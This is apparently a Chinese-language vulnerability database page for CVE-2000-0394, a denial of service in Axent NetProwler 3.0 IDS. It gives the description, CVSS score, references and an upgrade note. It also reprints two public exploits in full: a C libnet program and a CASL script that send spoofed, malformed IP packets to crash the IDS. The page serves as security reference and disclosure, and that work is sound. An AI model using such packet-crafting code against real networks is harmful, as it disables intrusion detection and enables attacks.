CVE-2000-0394
CVSS5.0
发布时间 :2000-05-18 00:00:00
修订时间 :2016-10-17 22:06:55
NMCOE    

[原文]NetProwler 3.0 allows remote attackers to cause a denial of service by sending malformed IP packets that trigger NetProwler's Man-in-the-Middle signature.


[CNNVD]Axent NetProwler畸形IP包DoS漏洞(CNNVD-200005-072)

        NetProwler 3.0存在漏洞。远程攻击者通过传送触发NetProwler中Man-in-the-Middle签名的畸形IP包导致拒绝服务漏洞。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0394
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0394
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-072
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=95878603510835&w=2
(UNKNOWN)  BUGTRAQ  20000519 RFP2K05: NetProwler vs. RFProwler
http://www.securityfocus.com/bid/1225
(UNKNOWN)  BID  1225
http://www.securityfocus.com/templates/archive.pike?list=1&msg=392AD3B3.3E9BE3EA@axent.com
(UNKNOWN)  BUGTRAQ  20000522 RFP2K05 - NetProwler "Fragmentation" Issue

- 漏洞信息

Axent NetProwler畸形IP包DoS漏洞
中危 其他
2000-05-18 00:00:00 2005-05-02 00:00:00
远程※本地  
        NetProwler 3.0存在漏洞。远程攻击者通过传送触发NetProwler中Man-in-the-Middle签名的畸形IP包导致拒绝服务漏洞。

- 公告与补丁

        Upgrade to NetProwler 3.5 (to be released in June 2000).

- 漏洞信息 (19940)

Axent NetProwler 3.0 Malformed IP Packets DoS Vulnerability (1) (EDBID:19940)
windows dos
2000-05-18 Verified
0 rain forest puppy
N/A [点击下载]
source: http://www.securityfocus.com/bid/1225/info

Axent NetProwler 3.0 IDS is vulnerable to a malformed packet attack. It will crash if the Man-in-the-Middle signature encounters a packet for which the following expression is true:
(IP_HEADER_LENGTH + TCP_HEADER_LENGTH) > IP_TOTAL_LENGTH

According to Axent Security team, this is not a fragmented packet issue as reported in RFP2K05 By Rain Forest Puppy.

In addition, NetProwler utilizes Microsoft JET engine 3.5 for storing incoming alert information. More information regarding the Microsoft JET engine 3.5 vulnerability can be found at:

http://www.securityfocus.com/bid/286 

/* 	RFProwl.c - rain forest puppy / wiretrip / rfp@wiretrip.net
	
	Kills NetProwler IDS version 3.0
	
	You need libnet installed.  It's available from
	www.packetfactory.net.  Acks to route.

	Only tested on RH 6.x Linux.  To compile:
	gcc RFProwl.c -lnet -o RFProwl			

	Plus, make sure your architecture is defined below:   */

#define LIBNET_LIL_ENDIAN 1
#undef  LIBNET_BIG_ENDIAN 1

#include <libnet.h>

/* it's just much easier to code in the packet frags we want. :) */

char pack1[]="\x45\x00"
"\x00\x24\x08\xb9\x00\x03\x3e\x06\x96\xf8\x0a\x09\x65\x0d\x0a\x09"
"\x64\x01\x04\x02\x08\x0a\x00\x26\xcd\x35\x00\x00\x00\x00\x01\x02"
"\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

char pack2[]="\x45\x00"
"\x00\x2c\x08\xbf\x20\x00\x3e\x06\x76\xed\x0a\x09\x65\x0d\x0a\x09"
"\x64\x01\x04\x08\x00\x15\xa7\xe4\x00\x48\x00\x00\x00\x00\xa0\x02"
"\x7d\x78\x72\x9d\x00\x00\x02\x04\x05\xb4\x00\x00";

int main(int argc, char **argv) {
    int sock, c;
    u_long src_ip, dst_ip;

    printf("RFProwl - rain forest puppy / wiretrip\n");

    if(argc<3){
      printf("Usage: RFProwl <profiled IP/destination> <src IP(fake)>\n");
      exit(EXIT_FAILURE);}

    dst_ip=inet_addr(argv[1]);
    src_ip=inet_addr(argv[2]);

    memcpy(pack1+16,&dst_ip,4);
    memcpy(pack2+16,&dst_ip,4);
    memcpy(pack1+12,&src_ip,4);
    memcpy(pack1+12,&src_ip,4);

    sock = open_raw_sock(IPPROTO_RAW);
    if (sock == -1){
      perror("Socket problems: ");
      exit(EXIT_FAILURE);}
    
    c = write_ip(sock, pack1, 46);
    if (c < 46) printf("Write_ip #1 choked\n");

    c = write_ip(sock, pack2, 46);
    if (c < 46) printf("Write_ip #2 choked\n");
  
    printf("Packets sent\n");

    return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);}
		

- 漏洞信息 (19941)

Axent NetProwler 3.0 Malformed IP Packets DoS Vulnerability (2) (EDBID:19941)
windows dos
2000-05-18 Verified
0 Pedro Quintanilha
N/A [点击下载]
source: http://www.securityfocus.com/bid/1225/info
 
Axent NetProwler 3.0 IDS is vulnerable to a malformed packet attack. It will crash if the Man-in-the-Middle signature encounters a packet for which the following expression is true:
(IP_HEADER_LENGTH + TCP_HEADER_LENGTH) > IP_TOTAL_LENGTH
 
According to Axent Security team, this is not a fragmented packet issue as reported in RFP2K05 By Rain Forest Puppy.
 
In addition, NetProwler utilizes Microsoft JET engine 3.5 for storing incoming alert information. More information regarding the Microsoft JET engine 3.5 vulnerability can be found at:
 
http://www.securityfocus.com/bid/286 

#include "tcpip.casl"
#include "packets.casl"

Src = pop args;
Dst = pop args;


Src = getip(Src);
Dst = getip(Dst);


iph = copy TCPIP;
iph.ip_version = 4;
iph.ip_headerlen = 5;
iph.ip_tos = 0;
iph.ip_length = 36;
iph.ip_id  = 2233;
iph.ip_offset = 3;
iph.ip_ttl = 62;
iph.ip_protocol = 6;
iph.ip_cksum = 38648;
iph.ip_source = Src;
iph.ip_destination = Dst;

tch = copy SYN;
tch.tcp_source = 1026;
tch.tcp_destination = 2058;
tch.tcp_seqno = 2542901;
tch.tcp_ackno = 0;
tch.tcp_offset = 0;
tch.tcp_x2 = 1;
tch.tcp_syn = 1;
tch.tcp_window = 768;

pk1data = "\x 0\x 0\x 0\x 0\x 0\x 0";


packet = [ iph, tch, pk1data ];

ip_output(packet);

iph2 = copy TCPIP;
iph2.ip_version = 4;
iph2.ip_headerlen = 5;
iph2.ip_tos = 0;
iph2.ip_length = 44;
iph2.ip_id = 2239;
iph2.ip_mf = 1;
iph2.ip_ttl = 62;
iph2.ip_protocol = 6;
iph2.ip_cksum = 30445;
iph2.ip_source = Src;
iph2.ip_destination = Dst;

tch2 = copy SYN;
tch2.tcp_source = 1032;
tch2.tcp_destination = 21;
tch2.tcp_seqno = 2816737352;
tch2.tcp_ackno = 0;
tch2.tcp_x2 = 10;
tch2.tcp_syn = 1;
tch2.tcp_window = 32120;
tch2.tcp_cksum = 29341;

pk2data = "\x 2\x 4\x 5\xb4 \x 0\x 0";

packet = [ iph2, tch2, pk2data ];

ip_output(packet);
		

- 漏洞信息

1343
Axent NetProwler Malformed IP Packet DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public Third-party Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2000-05-19 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站